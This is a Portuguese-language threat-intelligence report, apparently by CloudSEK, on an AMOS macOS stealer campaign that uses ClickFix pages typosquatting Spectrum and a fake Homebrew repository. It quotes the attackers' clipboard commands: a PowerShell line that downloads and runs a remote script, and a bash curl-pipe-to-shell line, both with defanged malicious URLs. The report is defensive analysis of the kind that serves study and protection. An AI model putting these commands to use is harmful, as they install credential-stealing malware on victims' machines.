🚀 A CloudSEK se torna a primeira empresa de segurança cibernética de origem indiana a receber investimentos da Estado dos EUA fundo
Leia mais

Uma nova campanha variante do Atomic macOS Stealer (AMOS) foi descoberta, aproveitando domínios com erros de digitação que imitam a Spectrum, uma provedora de telecomunicações com sede nos EUA. A campanha emprega o método Clickfix e entrega diferentes cargas com base no sistema operacional da vítima. Notavelmente, os usuários do macOS recebem um script de shell malicioso projetado para roubar senhas do sistema e baixar uma variante do AMOS para posterior exploração. O script usa comandos nativos do macOS para coletar credenciais, contornar mecanismos de segurança e executar binários maliciosos. Comentários em russo no código-fonte sugerem o envolvimento de cibercriminosos que falam russo. A lógica mal implementada nos sites de entrega, como instruções incompatíveis entre plataformas, aponta para uma infraestrutura montada às pressas. Esta campanha destaca uma tendência crescente de ataques de engenharia social em várias plataformas, direcionados tanto para consumidores quanto para usuários corporativos.
Durante o ciclo rotineiro de descoberta e atribuição da infraestrutura do atacante, descobrimos que vários sites de entrega com o tema Clickfix estavam tipoquatando a Spectrum, uma empresa com sede nos EUA que fornece serviços de televisão a cabo, acesso à Internet, segurança da Internet, serviços gerenciados, telefone celular e comunicações unificadas.


Quando a vítima clica em “Verificação alternativa”, um comando é copiado para a área de transferência e as instruções são exibidas para a vítima seguir. Assim como qualquer outra campanha do Clickfix.

No entanto, ao investigar mais a fundo, descobrimos que o site retornou respostas diferentes com base em diferentes agentes de usuário.
Área de transferência - agente de usuário não macOS
powershell -NoProfile -ExecutionPolicy Bypass -Command “$file = [System.IO.path] ::Combine ($env:Temp, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file” # Cloudflare
Esse é um dos métodos de entrega mais usados pelos usuários do Windows.
Área de transferência - agente de usuário do macOS
/bin/bash -c “$ (curl -FSSL https://applemacios[.]com/getrur/install.sh)” # Verificação do macOS #248187 autenticada pela Cloudflare. Direitos autorais Cloudflare 2025.
/bin/bash -c” ... “: Isso faz com que o sistema execute o comando dentro das aspas usando o shell Bash.
<URL>curl -FSSL:
A saída de curl (ou seja, o script install.sh) é executado imediatamente pelo Bash.
Conteúdo do install.sh

Ao analisar o arquivo salvo como “atualização” no diretório “tmp”, descobrimos que o malware pertence à família Atomic macOS stealer (AMOS). Variantes do AMOS, como Poseidon e Odyssey, foram vistas na natureza recentemente, ganhando força entre os cibercriminosos.
Após a divulgação de suas táticas e rede pela CloudSEK, os hackers mudaram para um novo método de distribuição: anúncios maliciosos de repositórios falsificados do GitHub destinados a desenvolvedores que usam o Homebrew. (h/t Jérôme Segura - Malwarebytes)

A sequência de ataque observada reflete o caso investigado anteriormente, envolvendo um script enganoso (“install [.] sh”) que busca uma carga útil de “atualização”, que é uma variante do AMOS. O processo de infecção se desenrola da seguinte forma:
Em 6 de junho de 2025, o agente da ameaça criou o falso repositório “Homebrew”.

Esses commits estavam simplesmente sendo feitos para substituir os antigos servidores de comando e controle pelos novos.


Como podemos ver acima, o agente da ameaça removeu o C2 existente e adicionou o caminho legítimo de instalação do Homebrew (github bruto), provavelmente estabelecendo a autenticidade da publicidade maliciosa.

Posteriormente, o URL legítimo foi substituído por C2s controlados pelo atacante. Todos os IOCs do repositório foram adicionados à tabela no final deste relatório.

Ao inspecionar o código-fonte da página de entrega, encontramos alguns comentários em russo, indicando que o malware provavelmente está sendo espalhado por Cibercriminosos que falam russo. Usando esses comentários como ponto central, junto com outros parâmetros HTTP, conseguimos encontrar IOFAs além dos IOCs.
As páginas de entrega em questão para essa campanha variante do AMOS continham imprecisões na programação e na lógica de front-end. Para agentes de usuário Linux, um comando do PowerShell foi copiado. Além disso, a instrução “Pressione e segure a tecla Windows+R” foi exibida para usuários de Windows e Mac.
